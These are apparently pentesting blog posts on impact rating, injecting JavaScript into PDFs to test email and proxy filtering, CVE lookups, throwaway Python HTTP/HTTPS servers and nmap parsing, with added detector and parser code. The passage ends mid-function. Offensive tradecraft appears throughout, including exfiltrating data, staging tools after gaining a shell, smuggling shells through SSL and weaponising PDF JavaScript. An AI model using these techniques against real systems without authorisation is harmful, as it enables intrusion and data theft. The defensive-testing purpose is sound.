First let's explain a simple impact model. There is a model called “CIA” which stands for Confidentiality, Integrity and Availability. Let's expand a little on these three concepts:

  • Confidentiality – Access to information which an attacker should not have. Pretty simple if an attacker can read your account details or access files from the server then they will know more than they should. The impact of a loss of confidentiality is dependent on the value of the disclosed information.
  • Integrity – Ability to modify information or execute arbitrary commands on a system would affect the integrity. If you change the contents of a web page to suit your needs you have affected the integrity. If you execute an operating system command you cannot trust the server is operating as intended anymore.
  • Availability – If an attacker can simply delete the data or the website content then you will be making it unavailable for legitimate users. If there is another means by which to prevent legitimate users acting as they would like, then you will also have removed availability.

Let's say you provide customers with impact ratings in the categories: high, medium, or low. A very simplistic approach but a fairly effective one, and not uncommon in the industry. In order to get to your category of impact you will need to evaluate your vulnerability in terms of the CIA for each answer in “What is impacted?”.

As we listed two entities that are impacted (or potentially so), let's ask ourselves two more questions and answer them:

What is the impact rating for the database?

Reminder: our SQL injection has allowed full: read, modify, insert and delete privileges.

Let's fill out the CIA model for the database then:

  • Confidentiality – We can read everything. All user data is at risk including login credentials potentially but definitely including personally identifiable information. There is a “high” impact to confidentiality.
  • Integrity – We can modify everything. You cannot trust the data anymore since an attacker could alter every accounts password, invent new orders etc. There is a “high” impact to integrity.
  • Availability – We can delete everything. Dropping all tables would remove everyone’s orders and their personal information. The site would be dead and nobody could access it or browse the product range. There is a “high” impact to availability.

Three “highs” under CIA? Seems to me we have a “high” impact vulnerability, what about you?

What is the impact rating for the operating system?

Reminder: our SQL injection cannot read or write files to the operating system, and cannot execute operating system commands.

Let's fill out the CIA model for the operating system then:

  • Confidentiality – We cannot read files. The impact to confidentiality of data held outside the database on the operating system is non-existent.
  • Integrity – We cannot modify files, and we cannot execute commands. The impact is non-existent.
  • Availability – We cannot execute commands. Even if we “drop all tables” at the database layer the OS would be functioning perfectly. Splitting hairs here because the net effect of dropping all tables is that the site would remain unavailable. But just to be clear the OS is sitting pretty and available.

Three “non-existent” impacts to the OS? Smells like a zero impact issue then.

You would provide customers with one impact rating only. The artistry in penetration testing is being able to calculate all of the potential impacts to arrive at a final snappy answer for the customer. They will often want to order vulnerabilities by the perceived “risk” or “impact” so that they can address the biggest points first.

You always lead with the biggest impact rating which in this case is to the database. You should also make mention of the OS impacts being explored in your report but proving fruitless on this occasion. However, we have arrived at “high” and that is what we go with.

There are various other models for calculating risk or impact and if you love a number from 0.0 to 10.0 then check out CVSS in particular. It is a fully fledged formula which embeds the concept of CIA reasonably well. As with my process above you would need to calculate multiple risks based on what is being affected and then select the highest rating.

The problem is that CVSS does not always sit well with every type of potential risk you may need to capture in your report. For those fiddly bespoke ones you sometimes have to get your hands dirty and pick a “high”, “medium” or “low” out of the air.

Now that you have read this you will know exactly what to do on that day.

Using JS2PDFInjector to check risks of PDF files with embedded JavaScript

Lets do a very short script for a play to set the scene for this one. Positions everyone:

CornerPirate: Love PDF? Love your JavaScript? Everyone’s favourite office file format and interactive code engine together!

*interlocks his finger*

CornerPirate: Let’s weave them together. What could possibly go wrong?

What could possibly go wrong indeed. No point dallying you can find out how that could go wrong at these places:

These are all way more detailed than I would choose to go on the subject and are worth a read.

Probably a great idea to make sure that your email, and Internet proxy blocks them coming inbound then isn’t it?

This post will show you a tool which can be used to inject JavaScript into a PDF so that you can evaluate your own inbound filtering systems.

Get the tool

You can get the source and the built jar from the repository below:


Download the zip or clone it down it is your choice.

Using it

Go to the “dist” directory and run the jar file. In Windows you can double click on the jar if you have the Java Runtime installed. Alternatively you can run:

java -jar JS2PDFInjector.jar

When it launches it will:

  1. Ask you to select a PDF file to inject into.
  2. Ask you to select a file containing JavaScript that you want to run when users open the PDF.
  3. Create the new PDF with “js_injected_” into the file name and make a new file in the same directory as the original PDF.

Pretty simple I think. It could be a command line tool. But meh I wanted file choosers for some reason that day. You have the source so go fix it if you like.

Creating Payloads

The JavaScript APIs are slightly different from those you might be familiar with in web browsers. In order to understand exactly how to create payloads you are going to need to understand the APIs here:

The JavaScript API reference: js_api_reference.pdf

As a pentester it is usually sufficient for me to simply evaluate whether the defences strip all JS from a PDF or quarantine the file on the way in. If your solution does not, then I can infer that you could be doing more to protect yourself.

So for me it has been enough to go with a simple alert message like this one:

app.alert("Hello world!");

If you want to weaponize this by injecting malicious things, then you do so at your own legal risk and I am not responsible for your actions.

I just felt that if this was in anyway useful to someone then I should share it!

How to use your file legitimately

So you found this blog because you wanted to evaluate your company's defences against PDFs with malware written in JavaScript? Awesome.

  1. Test your Anti-Virus [Local Only Test]
    1. Upload your PDF onto a server or workstation you want to test by USB or whatever works in your environment locally.
    2. Right click and scan with your anti-virus solution and see if it says anything.
    3. The chances are your PDF does not match any signature since you have made it yourself. However, if you have configured a solution which says it “warns when a PDF has JavaScript” or “quarantines” such files, check to see that it has found it.
    4. For bonus points if your AV is configured to log events centrally make sure someone has seen the log alert and has kicked off an investigation.
  2. Test your Email Filtering
    1. Use an external email address to email your PDF into a work address.
    2. If you have a complex system with multiple in-line inspection points before mail reaches a user, and the email still arrives with the attachment intact and triggers an alert (or whatever your payload is) in Adobe Reader, then you should repeat step one (Local AV scan). Your company is at risk as you have found that people can email in potentially dangerous PDF files. Repeating the AV scan manually will show whether it will ever find that file. At this point the payload has already run and you have been compromised.
    3. If the email arrived but Adobe does not execute your payload, the chances are that you have something in-line before it hits users which has attempted to remove the JavaScript from the PDF file but leave the original viewable content. Investigate on your filtering systems which component has done this and see if there was an appropriate alert raised and an investigation by a member of staff. This is still evidence that somebody *tried* to target your users.
  3. Test your Internet proxy Filtering
    1. Upload your PDF file to an Internet web server. It has to be the Internet because Microsoft's various web browsers implement a “zone” model for security; the Internet zone is the least trusted, so it gives the fairest evaluation.
    2. Download the file in the default web browser for your users, going through all Internet proxy and inspection routes.
    3. If the payload executes when opened in Adobe, then you have found another route to download PDF files with JavaScript onto your target machine from an external source. Repeat step one to see if you have a last-ditch defence in the AV. However, it is worth noting that the AV allowed the payload to run so…. hmmmm. You are already compromised and should look at the AV solution.
    4. Again, if the payload did not execute, try to investigate where in the chain it happened, and then look for staff to have reacted to that alert.

You can take these techniques and alter them for all other routes into your organisation. A file-upload on a website? An SFTP service etc.
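To see what the “warns when a PDF has JavaScript” check in the steps above actually has to look for, here is an added example of my own (not part of JS2PDFInjector). It scans a PDF for JavaScript and auto-run action names, folds the hex-escaped name trick (/J#53 for /JS) and looks inside FlateDecode streams; the sample PDFs are constructed inline and carry the app.alert test payload from above.

```python
import re
import zlib

# Names whose presence means active content or an auto-run trigger.
SUSPECT_NAMES = (b"JavaScript", b"JS", b"OpenAction", b"AA", b"Launch")
NAME_RE = re.compile(rb"/(" + b"|".join(SUSPECT_NAMES) + rb")(?![A-Za-z0-9])")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def _unescape_names(data: bytes) -> bytes:
    """PDF permits /J#53 for /JS; fold such escapes so they cannot hide a name."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def _inflate_streams(data: bytes):
    """Yield the body of every stream that inflates; skip those that are not Flate.

    For production use cap the inflated size, since a stream can be a zip bomb."""
    for m in STREAM_RE.finditer(data):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue


def find_active_content(pdf: bytes) -> dict:
    """Count each suspect name in the raw bytes and inside inflated streams."""
    hits = {}
    for view in [pdf] + list(_inflate_streams(pdf)):
        for m in NAME_RE.finditer(_unescape_names(view)):
            key = m.group(1).decode()
            hits[key] = hits.get(key, 0) + 1
    return hits


def has_javascript(pdf: bytes) -> bool:
    """True if a JavaScript action or JS string is present anywhere we can see."""
    hits = find_active_content(pdf)
    return "JavaScript" in hits or "JS" in hits


# Constructed samples (minimal, no xref table; for scanning, not for opening).
# INJECTED_PDF has the shape of a document whose OpenAction runs the
# app.alert test payload from above.
_HEADER = (b"%PDF-1.4\n2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
           b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n")
_ACTION = b'4 0 obj << /S /JavaScript /JS (app.alert("Hello world!");) >> endobj\n'
_TRAILER = b"trailer << /Root 1 0 R >>\n%%EOF\n"

BENIGN_PDF = _HEADER + b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n" + _TRAILER
INJECTED_PDF = (_HEADER + b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
                + _ACTION + _TRAILER)
# Same content with hex-escaped names, a trick that defeats a naive grep.
OBFUSCATED_PDF = (_HEADER + b"1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj\n"
                  + b'4 0 obj << /S /Java#53cript /J#53 (app.alert("Hello world!");) >> endobj\n'
                  + _TRAILER)
# Same action object hidden inside a FlateDecode stream.
_BODY = zlib.compress(_ACTION)
COMPRESSED_PDF = (_HEADER + b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
                  + b"5 0 obj << /Type /ObjStm /Filter /FlateDecode /Length %d >>\nstream\n" % len(_BODY)
                  + _BODY + b"\nendstream\nendobj\n" + _TRAILER)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PDF), ("injected", INJECTED_PDF),
                       ("obfuscated", OBFUSCATED_PDF), ("compressed", COMPRESSED_PDF)):
        print(label, has_javascript(doc), find_active_content(doc))
```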

Hope that helps



Using CVE data, with CVE-Offline

Tl; dr version – I made a thing that makes the bulk of CVE vulnerability details easy to grep for use when reporting. Get it here: https://github.com/cornerpirate/cve-offline. I update it once a month from the NIST database.

Anyone sticking around to read the rest gets a process for checking for known weaknesses in a service. Rationales for why, as well as a bit about how to use CVE-Offline.

Rationale and Process for vulnerability identification

When writing penetration test reports you will need to interact with many online resources to do that well. The simplest thing that you should do is include a summary of any known weaknesses within an installed version of software.

The biggest database of shared vulnerability knowledge is the CVE database. An overview of that is available at the URL below:


Almost every vulnerability in common services will result in a vendor patch AND an entry with a unique CVE identifier. When you are targeting a customer you need to compile a list of known flaws. This is so you can advise them of the exact technical risk posed by using version X of Apache on the day the test was conducted (as an example, not to pick on Apache).

To do this, you can follow the process outlined below:

  1. Identify a service version – “nmap -sV -p <portnumber> <ip>” will do this in most cases.
  2. Look for known vulnerabilities in version – If you are using Nessus, or an alternative vulnerability scanner, they do a pretty decent job of maintaining their database of CVE issues. “IF $version == x.x.x THEN vulnerable to x,y,z” is the logic they use.
    1. If the service is unknown to your vulnerability scanner you will have to find your own list of CVEs if possible. Look up the vendor and product on http://www.cvedetails.com/.
    2. They have an export facility of sorts so you can use the output for your product to achieve what CVE-Offline does when you have an Internet connection.
    3. Alternatively, you are going to have to find the release notes, bug tracker, or change log for your target service. They usually track security defects using CVE references. This is not universal though.
  3. Format your list for your report – now that you have a list you are going to want to present them to your customer.
    1. If your list of vulnerabilities is around 20 you can probably show a summary of each issue to the customer.
    2. If the list is ENORMOUS, then are you adding much value in creating 20 pages in your report? Probably not.
    3. In both scenarios you can present the most significant risks with fuller write ups. Go out looking for exploit code to help quantify the exploitability of the service, and present a statistical summary.
    4. For example, “The service had 200 known weaknesses within the CVE database. Of those X were in the high risk range, Y were in the medium risk range, and Z were in the low risk range. The consultant would advise special attention is paid to CVE-….-…. and CVE-….-…. which allow remote code execution, and denial of service respectively.”

Following that process should get what you want in your reports.

A word on false positives

The above process is pretty simple. There is one massive caveat that you will need to be aware of. That process is, more often than not, based on the service banner returned by your target.

If the OS uses “backporting” to supply security updates, or the admin has mucked about, then the banner number will not necessarily reflect the target’s exploitability. In this case we can get into “false positives”. A quick Google gives us the following definition:

Definition of a false positive – Circa Christmas 2016

If the target reports a service banner which does not match the vendor's official release history, then your results will be inaccurate and you have a false positive.

If we are testing in a black-box scenario we have no access to the underlying operating system by default and cannot fully confirm the banner status in many cases.

What to do? Ensure that your report includes phrases like these:

  1. Vulnerability based on service banner only.
  2. Potential false positive result.
  3. Impact and risk based on assumption that banner was accurate as this is the worst case scenario.

The first line of your recommendations section should definitely be “Conduct an investigation to ensure that the service is vulnerable”. Be sure that you convey these sentiments on all phone calls with your customer and they should learn to trust the other results more as they do not have them!

With that caveat dealt with by the language in your report you can be sure to prevent awkward phone calls when customers call up going “we looked into it, and it was NOT vulnerable.”

Experience tells me that even if you include these caveats you have to justify yourself sometimes. Be aware of it coming by preparing some polite reasons to give.

Using CVE-Offline

It is pretty simple to obtain CVE-Offline. Just clone the git down:

git clone https://github.com/cornerpirate/cve-offline.git

You can then use your platform's “grep” of choice to find a CVE in the “cve-summary.csv” file. For example, to look for “CVE-2016-0142” do the following:

grep "CVE-2016-0142" cve-summary.csv
CVE-2016-0142,9.3,"Video Control in Microsoft Windows Vista SP2, Windows 7 SP1, Windows 8.1, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows remote attackers to execute arbitrary code via a crafted web page, aka ""Microsoft Video Control Remote Code Execution Vulnerability."""

This has given you a comma separated line of output that you can now work with. The format of this line is:


You can pipe that bad boy into a .csv file, open it in excel and make pretty tables that you can paste into your report. You are welcome.
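Rather than hand-counting in a spreadsheet, here is an added example of my own (not part of CVE-Offline) that parses lines in the cve-summary.csv shape, greps them, buckets the scores and renders the statistical summary sentence from the process above. The sample data is constructed: the first line is the CVE-2016-0142 entry shown above, the CVE-0000-* ids are placeholders, and the high/medium/low bands are assumed to be the CVSS v2 ranges.

```python
import csv
import io

# Constructed sample in the shape of cve-summary.csv: id, CVSS score, quoted
# description (embedded quotes doubled). First line is the real CVE-2016-0142
# entry from the grep above; the CVE-0000-* ids are placeholders, not real CVEs.
SAMPLE_CSV = '''CVE-2016-0142,9.3,"Video Control in Microsoft Windows Vista SP2, Windows 7 SP1, Windows 8.1, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows remote attackers to execute arbitrary code via a crafted web page, aka ""Microsoft Video Control Remote Code Execution Vulnerability."""
CVE-0000-0001,7.5,"Placeholder: remote code execution in Example Service 1.2.3"
CVE-0000-0002,5.0,"Placeholder: denial of service in Example Service 1.2.3"
CVE-0000-0003,4.3,"Placeholder: cross-site scripting in Example Service admin page"
CVE-0000-0004,2.1,"Placeholder: local information disclosure in Example Service"
CVE-0000-0005,,"Placeholder: Example Service entry not yet scored"
'''

# Assumed bands: CVSS v2 qualitative ranges (the 9.3 above is in that style).
# Adjust the floors if your file carries v3 scores.
BANDS = (("high", 7.0), ("medium", 4.0), ("low", 0.0))


def band_for(score):
    """Map a numeric score to high/medium/low; a missing score is 'unscored'."""
    if score is None:
        return "unscored"
    for name, floor in BANDS:
        if score >= floor:
            return name
    return "low"  # only reached for a negative score, which should not occur


def parse_summary(text):
    """Parse cve-summary.csv content into dicts; tolerate blank score fields."""
    entries = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 3:
            continue  # skip blank or malformed lines rather than crash mid-report
        cve_id, raw_score, description = row[0].strip(), row[1].strip(), row[2]
        score = float(raw_score) if raw_score else None
        entries.append({"id": cve_id, "score": score, "band": band_for(score),
                        "description": description})
    return entries


def select(entries, needle):
    """Case-insensitive grep over the description, like the grep in the post."""
    needle = needle.lower()
    return [e for e in entries if needle in e["description"].lower()]


def summarise(entries, top_n=2):
    """Counts per band plus the highest-scored entries to call out individually."""
    counts = {"high": 0, "medium": 0, "low": 0, "unscored": 0}
    for e in entries:
        counts[e["band"]] += 1
    scored = [e for e in entries if e["score"] is not None]
    top = sorted(scored, key=lambda e: e["score"], reverse=True)[:top_n]
    return {"total": len(entries), "counts": counts, "top": top}


def report_paragraph(summary):
    """Render the statistical summary sentence from the process above."""
    c = summary["counts"]
    ids = " and ".join(e["id"] for e in summary["top"])
    text = (f"The service had {summary['total']} known weaknesses within the CVE database. "
            f"Of those {c['high']} were in the high risk range, {c['medium']} were in the "
            f"medium risk range, and {c['low']} were in the low risk range.")
    if c["unscored"]:
        text += f" {c['unscored']} had no score assigned yet."
    if ids:
        text += f" The consultant would advise special attention is paid to {ids}."
    return text


if __name__ == "__main__":
    entries = parse_summary(SAMPLE_CSV)
    print(report_paragraph(summarise(entries)))
```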

Updating CVE-Offline

I update the repository once a month from the NIST export feeds. You can get the raw data from here if you want:


Otherwise you basically need to use git to update once a month. Enter your local “cve-offline” directory and do this:

git pull

Personally I have often forgotten how the heck to update a repository I use. So there you are, it is written down!

Simple HTTP/HTTPS Servers in Python

There are loads of situations where you need a quick way to spin up an HTTP server. The following are just off the top of my head but I bet you can all think of more:

  • You have established a shell and you want to upload tools to your new computer.
  • You want to exfil data back out of an environment.
  • You have found an XSS and you want to prove you can get useful data out of a victim’s session easily.
  • You want to host a JavaScript file to prove the dangers of poor Transport Layer Security or sites which host files on 3rd party hosts.

In these situations configuring Apache is overkill and you probably only want a simple service which will last a matter of minutes. I am going full Python for this one and I have reworked this post to include Python3 syntax to keep it current in 2018.

Don’t Run with Scissors

The HTTP and HTTPS listeners that I show in this post will share the contents of the folder where you run them. As with all situations “BE AWARE OF WHAT IS IN YOUR WEB ROOT”. If you are starting a listener on the Internet then it will be port scanned within 30 minutes, and you will see automated attackers spamming your logs.

Before you run any of these services take a moment to consider where you are running them. I usually create a folder in “/tmp/” for an engagement such as “/tmp/safeplace” since this will not persist for very long.

Additionally, these servers have Directory Listings enabled by default. If you want to limit what can be seen it is a good idea to create an “index.html” file in your folder. That way your assailant will be forced to use Dirbuster which gets noisy.

Simple HTTP Server (Python 2)

For most situations this is my goto move:

python -m SimpleHTTPServer <port> # Syntax
python -m SimpleHTTPServer 8080   # Example

When you run this it starts to log things to the console as shown:


By default you get the IP address of the client. Then the files and response codes.

Simple HTTP Server (Python 3)

Python 3 is the future!!! They have renamed the module to “http.server”. Time to update your tools to do this:

python3 -m http.server <port> # Syntax
python3 -m http.server 8080   # Example

Which does very similar things as shown below:


Not a lot different really.

Generating Keys and Certificates for HTTPS

Sometimes you need to use HTTPS. The two best cases are:

  1. To Gain Privacy – if your target has traffic inspection but they do not terminate SSL then you can genuinely smuggle shells through SSL. I have seen a customer network which would catch plain-text but did nothing about an HTTPS connection.
  2. To Avoid Browser Mixed Content Warnings – these warnings can hinder a decent proof of concept. If you are trying something that “should be working goddamn it!”. Consider looking at the developer tools for your web browser and look for mixed content exceptions.

Whatever your motivation the HTTPS services I show will rely on you having a “privatekey.pem” and “cert.pem” file. You can generate these with openssl using the commands below:

openssl genrsa > privatekey.pem
openssl req -new -x509 -key privatekey.pem -out cert.pem -days 365

You will be prompted to enter information to populate the fields of your self-signed SSL certificate. I stuff those with spam for proof of concepts. If I was engaged in a phishing exercise then a legit SSL certificate is the right move. 

Simple HTTPS Server (Python 2)

I really liked “twisted” because it can do a *lot* of things. First you will need to install that using python’s pip package manager as shown:

pip install twisted

You can then start an HTTPS service using the command below:

twistd web --https=<port> --path=. -c </path/to/cert.pem> -k </path/to/privatekey.pem> #Syntax
twistd web --https=8443 --path=. -c cert.pem -k privatekey.pem                         #Example

Twisted automatically creates a logfile called “twisted.log” in the current directory; it does not echo to stdout, so you need to use:

tail -f twisted.log

The “-f” means read this file when it changes. The following shows what this means:


The content of the output includes User-Agents and more debugging related to SSL but is otherwise similar to “SimpleHTTPServer”.

Simple HTTPS Server (Python 3)

Python 3 is the future!!! Python 3 is the future!!! Python 3 is the future!!!

Again there are minor differences between python 2 and 3. This time you have to use “pip3” to install Twisted:

pip3 install twisted

If you already have “twisted” installed for python 2 this can get a bit confusing. Running the above seems to clobber the version in the path. When you run “which twistd” you will be pointed at the python3 version. Don’t trust me? Check the first line of that file:


Great. So is the syntax to run the server different? Fortunately not in my test the following worked just fine once more:

twistd web --https=<port> --path=. -c </path/to/cert.pem> -k </path/to/privatekey.pem> #Syntax
twistd web --https=8443 --path=. -c cert.pem -k privatekey.pem                         #Example

Hope that saves you some time when you want a simple HTTPS server!
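If you would rather not install Twisted, here is an added example of my own (not from the post) of a Python 3 stand-in: the stock http.server handler with directory listings refused, speaking HTTPS when handed the cert.pem and privatekey.pem generated above and plain HTTP otherwise. It assumes Python 3.7 or later; the self_test() helper proves the listing behaviour against a throwaway loopback port.

```python
import http.server
import os
import ssl
import sys
import tempfile
import threading
import urllib.error
import urllib.request
from functools import partial


class NoListingHandler(http.server.SimpleHTTPRequestHandler):
    """Same as 'python3 -m http.server' except a directory with no index.html
    answers 403 instead of listing its contents, so nothing in the web root is
    advertised by accident."""

    def list_directory(self, path):
        self.send_error(403, "Directory listing disabled")
        return None


def make_server(directory, port, certfile=None, keyfile=None, bind="0.0.0.0"):
    """Build (but do not start) a server rooted at `directory`.

    With certfile/keyfile it speaks HTTPS using the cert.pem / privatekey.pem
    produced by the openssl commands above; without them it is plain HTTP.
    """
    handler = partial(NoListingHandler, directory=directory)
    httpd = http.server.ThreadingHTTPServer((bind, port), handler)
    if certfile and keyfile:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain(certfile, keyfile)
        httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    return httpd


def self_test():
    """Spin up a plain-HTTP instance on a throwaway loopback port and record the
    status code for the bare directory (no index.html) and for a real file."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "tool.txt"), "w") as fh:
        fh.write("constructed sample file\n")
    httpd = make_server(root, 0, bind="127.0.0.1")
    port = httpd.server_address[1]
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    results = {}
    try:
        for path in ("/", "/tool.txt"):
            try:
                with urllib.request.urlopen(f"http://127.0.0.1:{port}{path}") as resp:
                    results[path] = resp.status
            except urllib.error.HTTPError as err:
                results[path] = err.code
    finally:
        httpd.shutdown()
        httpd.server_close()
    return results


if __name__ == "__main__":
    # Usage: python3 serve.py <port> [cert.pem privatekey.pem]
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8080
    cert, key = (sys.argv[2], sys.argv[3]) if len(sys.argv) > 3 else (None, None)
    server = make_server(os.getcwd(), port, cert, key)
    scheme = "https" if cert else "http"
    print(f"Serving {os.getcwd()} on {scheme}://0.0.0.0:{port}/ (listings disabled)")
    server.serve_forever()
```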

Take care

Working with nmap-summariser & nmap-grepper

We all love nmap right? Once you get through that learning spike at the start that is. Once you are happily battering out “-sS -sV -A -Pn ..” you feel like you have made it as a hacker. Not quite there yet? Practice kiddo.

A tool for nearly every challenge.

Finder of ports. Enumerator of versions. Confirmer of many vulnerabilities. Friend. Ally. For some of the hackers afraid of human contact I might even guess at… “lover”? But that is idle speculation.

The tl; dr version of this blog post is simply that there is a github repository here:


Clone it and play with the python scripts if that is what you want to do. Thanks for coming!

Some of you are reading on? Ok then. I will mention both of the scripts and why they exist.

Create Some Nmap Results

Before proceeding I need to have some results to play with. Lets port scan google.com because they are the heroes we need and can take it.

Here is the command that was run:

nmap -sS -sV -Pn -oA nmap-google.com -v www.google.com
Nmap scan report for www.google.com (
Host is up (0.0080s latency).
Other addresses for www.google.com (not scanned): 2a00:1450:4009:805::2004
rDNS record for lhr35s03-in-f4.1e100.net
Not shown: 998 filtered ports
80/tcp open http
443/tcp open ssl/https
2 services unrecognized despite returning data.

I beg the courts indulgence to explain the flags:

  1. -sS – A TCP SYN Scan. A privileged command so you need to have root privileges.
  2. -sV – Conduct a version scan. When nmap knows your service the “service”, “version” and “extra” parts of the output and XML files are populated with juicy details.
  3. -oA – Output to all three common nmap formats.
    1. “.nmap” – as shown in the above example.
    2. “.xml” – an XML file that nmap-summariser and nmap-grepper use.
    3. “.gnmap” – greppable nmap format. Comma separated variables.
  4. -v – Be a little verbose. Just a little.

The core bit here is that you must export the XML file format to use the tools I am talking about later. The optional part is using “-sV” to get more information to play with.


I made this to meet a need I had when writing a report. You pass it an nmap “.xml” file and it will spit out the data. Primarily I published this code so that someone had a simple baseline Python script that they could manipulate the output of easily to match whatever they needed. Funnily enough, nmap-grepper exists because it turned out I needed it!

This is not really meant to be used by people, but it had the hooks in the right places of the XML file so you could simply alter what you printed out to match your needs.

How does it work? Hackers are often curious so lets peek under the hood:

The for loop to look at

This is the key part of the script. The code above line 48 gets a reference to the XML file as an object and allows us to pick out specific XML nodes to get data from. To understand the for loop we need to know a little bit about the XML file format.

Here is a high level view of the XML structure:

 <scaninfo> Information related to how the scan was configured </scaninfo>
 <host> all data about host A </host>
 <host> all data about host B </host>
 <host> all data about host C </host>
 <runstats> Information about how long it took to run etc. </runstats>

The key part to note is that there is one or more “<host>” tags. Each IP address in your scan will be represented by a “<host>” tag. I have showed three to get the point across. Of-course our XML file from scanning google.com will have only one “<host>” tag.

Lets look at that for loop again. As I think of myself as a nice guy here it is below:

Hey, it is that for loop again!

You can probably tell that this for loop is now essentially going through every “<host>” tag. Lines 49 and 50 are then getting access to a child node and then an attribute of that child node respectively. This is shown below:

Marrying the XML to the Python Code

I haven’t made my script amazingly robust. You might find errors at line 49 if it somehow does not have an entry at position [0]. It may also behave unexpectedly on an IPv6 network at line 50. Who knows?

For more information there is no substitute for opening your “nmap-google.com.xml” file in a text editor, and viewing the nmap-summariser.py script to see which tags/attributes it picks out:


For bonus points. Modify your script to display output in this format:


You will need to find a target, and re-run nmap with “-O” to force an operating system guess.

You will have to heavily modify the output lines to achieve this, and my script doesn’t even vaguely touch the OS tags so you have to find them in the XML. Happy hunting!


I went onsite and had a need to grep ports very quickly since there was a lot of data to sift through. So I modified “nmapsummariser.py” and ended up with “nmapgrepper.py”:


Why does this exist when nmap outputs a “.gnmap” which is greppable? Well, because that isn’t very greppable! Is the answer. The “.gnmap” format uses one line per host which can include any number of services. It gets very messy to work with very quickly.

So what does “nmapgrepper.py” do ? It simply flips it so you get a port/service view instead of a host view. Like this:

Output of nmapgrepper.py

With one host that only has two services we do not have much to work with here. Imagine this blown up to an internal network which has thousands of internal services. You can use “grep” and “cut” very quickly to interact with this file format. Want to find all “http” services?

Using grep to list only http services

A simple grep will give you all services that operate on plain-text HTTP.

Want to just store the IP addresses that have “http” ? Go for a cut mate, like this:

Using cut to display only the IP

There you go, you can now slice and dice an nmap scan to focus on particular services quickly. May no FTP service permit anonymous logins without you knowing about it.

When tackling a massive network I try to take a service approach first because a few common flaws will “get you in” most times. If that isn’t working flipping your attention to individual hosts that have some interesting services you can enumerate will often yield results.

If you want another coding challenge here then why not make “nmapgrepper.py” spit out this format instead:


That means more opportunities for greppability. Find me all things running Microsoft Server 2008? Show me any host with “dev” or “test” in the hostname? These are things you will be able to answer if you do.

Note: you can achieve the same effect with metasploit if you have enabled the Postgres database. Your reading for that is 100% this URL:


I don’t claim nmapgrepper is better. It is just sometimes fun to roll your own to know more.
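Since the screenshots of the scripts and their target formats are not reproduced here, this is an added example of my own (not the repository's nmapsummariser.py or nmapgrepper.py) that walks the <host> tags the way the for loop above does, emits the port/service view, and takes on both coding challenges: it picks the IPv4 address rather than indexing address[0], tolerates missing nodes, and adds hostname and the -O osmatch as columns in a comma-separated format I chose. The nmap XML is constructed to mirror the www.google.com scan above with a second host added.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output shaped like the www.google.com scan above, plus a
# second host so the filters have something to separate. IPv4 addresses are from
# the 192.0.2.0/24 documentation range; only nodes the parser reads are included.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -Pn -oA nmap-google.com -v www.google.com">
  <scaninfo type="syn" protocol="tcp" numservices="1000"/>
  <host>
    <status state="up"/>
    <address addr="2a00:1450:4009:805::2004" addrtype="ipv6"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames>
      <hostname name="www.google.com" type="user"/>
      <hostname name="lhr35s03-in-f4.1e100.net" type="PTR"/>
    </hostnames>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https" tunnel="ssl"/></port>
    </ports>
    <os><osmatch name="Linux 3.2 - 4.9" accuracy="90"/></os>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.20" addrtype="ipv4"/>
    <hostnames><hostname name="dev-box.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="3.0.3"/></port>
      <port protocol="tcp" portid="22"><state state="closed"/><service name="ssh"/></port>
    </ports>
  </host>
  <runstats><finished elapsed="12.3"/></runstats>
</nmaprun>
"""

FIELDS = ("ip", "hostname", "port", "proto", "service", "version", "os")


def host_address(host):
    """Prefer the IPv4 address, then IPv6, then MAC; never index address[0] blindly."""
    addrs = {a.get("addrtype"): a.get("addr") for a in host.findall("address")}
    return addrs.get("ipv4") or addrs.get("ipv6") or addrs.get("mac") or ""


def host_name(host):
    """First hostname nmap recorded (user-supplied or reverse DNS), else empty."""
    names = host.findall("hostnames/hostname")
    return names[0].get("name", "") if names else ""


def host_os(host):
    """Best osmatch name, present only when the scan was run with -O."""
    match = host.find("os/osmatch")
    return match.get("name", "") if match is not None else ""


def service_rows(xml_text, open_only=True):
    """One dict per port: the port/service view rather than the host view."""
    rows = []
    for host in ET.fromstring(xml_text).findall("host"):
        ip, name, osname = host_address(host), host_name(host), host_os(host)
        for port in host.findall("ports/port"):
            state = port.find("state")
            if open_only and (state is None or state.get("state") != "open"):
                continue
            svc = port.find("service")
            service, version = "", ""
            if svc is not None:
                service = svc.get("name", "")
                if svc.get("tunnel"):  # nmap prints this as ssl/https
                    service = f"{svc.get('tunnel')}/{service}"
                version = " ".join(v for v in (svc.get("product"), svc.get("version"),
                                               svc.get("extrainfo")) if v)
            rows.append({"ip": ip, "hostname": name, "port": int(port.get("portid")),
                         "proto": port.get("protocol", ""), "service": service,
                         "version": version, "os": osname})
    return rows


def to_grep_lines(rows):
    """Comma-separated, one service per line, so grep and cut work on it."""
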